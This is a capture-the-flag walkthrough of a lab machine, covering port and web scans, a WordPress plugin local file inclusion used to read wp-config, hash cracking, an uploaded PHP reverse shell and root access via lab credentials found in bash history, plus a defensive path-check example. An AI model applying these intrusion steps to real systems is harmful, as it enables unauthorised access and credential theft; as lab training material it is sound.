tl;dr

  • Local File Inclusion

Solved by: 47Suriya

The IP of the target machine is found using the Netdiscover tool.

Netdiscover

The IP of the machine is 192.168.29.184.

Initial Analysis

First, the Nmap scanner is used to find all the open ports and services.

┌──(kali㉿kali)-[~]
└─$ nmap -p- -sV -T4 192.168.29.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-11 01:53 EDT
Nmap scan report for 192.168.29.184
Host is up (0.0021s latency).
Not shown: 65523 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain dnsmasq 2.75
80/tcp open http PHP cli server 5.5 or later
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.7.12-0ubuntu1
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.84 seconds

This scan shows a large number of open ports. NetBIOS is open on port 139, SSH is running on port 22 (which will need a username and password to log in), and an Apache server is listening on port 12380, which might contain some information.

When navigating to the page on port 12380:

Page

It contained nothing useful.

Next, the Nikto web scanner is used to scan for possible vulnerabilities.

┌──(kali㉿kali)-[~]
└─$ nikto -h http://192.168.29.184:12380/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.29.184
+ Target Hostname: 192.168.29.184
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2021-08-11 01:56:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'dave' found, with contents: Soemthing doesn't look right here
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/admin112233/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/blogblog/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Hostname '192.168.29.184' does not match certificate's names: Red.Initech
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2021-08-11 01:58:54 (GMT-4) (148 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

This scan also revealed a robots.txt file and some hidden directories: /phpmyadmin/, /blogblog/ and /admin112233/.
When trying to check the directories disallowed in robots.txt, the request is redirected to the home page; by adding https:// before the IP, the file can be viewed.

robots.txt

This listed the directories which were already shown in the nikto scan. So it is time to check them out.

The admin112233 directory contained something scary:

beefhook

Then navigating to the blogblog directory:

blog

It was a blog page. And there was also an option to login. When that was selected:

wplogin

A WordPress login page opened, but at this point there were no login credentials.

Exploit

So WPScan (the WordPress security scanner) is used to enumerate users, plugins and any vulnerabilities.

wpscan

It revealed a number of usernames and plugins, and also that the plugin advanced-video-embed-embed-videos-or-playlists was vulnerable. Searching for it turned up a WordPress Plugin Advanced Video 1.0 exploit that takes advantage of a Local File Inclusion vulnerability.

And in the description it said:

description

The description revealed that the contents of the wp-config file can be read, which might contain useful information.
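As an added defensive illustration (not code from the write-up, the plugin or the exploit), the Python below shows the containment check a file-serving plugin must apply to a caller-supplied file name before reading it; the absence of such a check is what produces a Local File Inclusion like the one described above. The web-root layout and file names it builds are constructed for the example.

```python
import os
import tempfile
from pathlib import Path


def resolve_inside(base_dir, requested):
    """Return the real path of `requested` only if it stays inside `base_dir`.

    The containment check a file-serving plugin needs before reading a
    caller-supplied name: join it to the allowed directory, resolve '..'
    and symlinks, then require the result to still sit under the base.
    Traversal, absolute paths and symlinks pointing out all yield None.
    """
    base = Path(base_dir).resolve(strict=True)
    # pathlib discards `base` when `requested` is absolute, so an absolute
    # input lands outside the base and is rejected by the check below.
    candidate = (base / requested).resolve()
    if candidate != base and base not in candidate.parents:
        return None
    return str(candidate)


def demo():
    """Build a constructed web root and run the check over sample requests.

    Layout (constructed for this example, not the original machine):
      root/wp-config.php                    secret outside the uploads dir
      root/uploads/pic.jpeg                 legitimate upload
      root/uploads/link -> ../wp-config.php symlink that points outside
    Returns a dict mapping each request to its resolved path or None.
    """
    root = Path(tempfile.mkdtemp())
    uploads = root / "uploads"
    uploads.mkdir()
    (root / "wp-config.php").write_text("DB_PASSWORD=constructed\n")
    (uploads / "pic.jpeg").write_bytes(b"\xff\xd8\xff")
    os.symlink(root / "wp-config.php", uploads / "link")
    requests = [
        "pic.jpeg",                 # allowed: stays inside uploads
        "../wp-config.php",         # classic traversal
        "sub/../../wp-config.php",  # traversal behind a non-existent dir
        "/etc/passwd",              # absolute path
        "link",                     # symlink resolving outside the base
    ]
    return {r: resolve_inside(uploads, r) for r in requests}


if __name__ == "__main__":
    for req, path in demo().items():
        print(f"{req!r:28} -> {'ALLOWED ' + path if path else 'rejected'}")
```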

After downloading the exploit, the IP in it has to be changed before it can be run. It is then run with the command below:

python exploit.py

There was no output returned. So let’s go to the blog page again:

blog2

There was a difference now: a new JPEG file had been added to the blog, which might be something useful. After searching for the location of uploaded files,
the directory was found to be /wp-content/uploads. Time to check that out:

uploads

It showed the file that was added to the blog, but the file could neither be downloaded nor viewed this way. So let’s download it using wget:

wget

And the file was downloaded! Now time to check it out. When using cat to display the contents of the file:

cat

It was the config file, and it contained the root username and password, which can be used to log in to the database. Once logged in, there were several databases, including one named wordpress. After displaying the tables in it:

database

There was a wp_users table which might contain critical information such as usernames and passwords. Using the DESCRIBE command, the structure of the table can be displayed:

describe

And yes! There were columns user_login and user_pass, which should be the usernames and passwords. When those were displayed:

passwords

There were several usernames and hashed passwords. So let’s try to crack the first hash, which corresponds to the user John.
Here the tool John the Ripper is used to crack the hash; --show prints the result:

┌──(kali㉿kali)-[~]
└─$ john --show hash.txt
?:incorrect

1 password hash cracked, 0 left

And the password for ‘John’ was found to be ‘incorrect’. Now it is time to log in to WordPress as John.

John

And after the login, a PHP reverse shell from Pentest Monkey is uploaded as a plugin so that a reverse shell can be spawned.

uploadrev
uploadedrev

After uploading it, let’s check the uploads directory that was used to download the JPEG file earlier. Now it’s time to spawn a reverse shell:
start a netcat listener on the attacking machine and open the uploaded reverse shell file on the target machine.

reverse

Now a reverse shell is spawned. This is a dumb (non-interactive) shell; it can be upgraded to a proper one using the command below:

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

Now the privileges should be escalated to root. For that, the bash history is checked for previously used commands:

bashhistory

The history reveals two sets of SSH login credentials:

JKanode:thisimypassword
peter:JZQuyIN5

When logging in via SSH as JKanode, the user had no sudo permissions. But when logging in as peter and checking the allowed sudo commands:

petershell

Yes! User peter can run all commands. Now it is time to become root using the command sudo su.

root

And after getting root access, the flag is found in the /root directory.

The challenge is now complete!!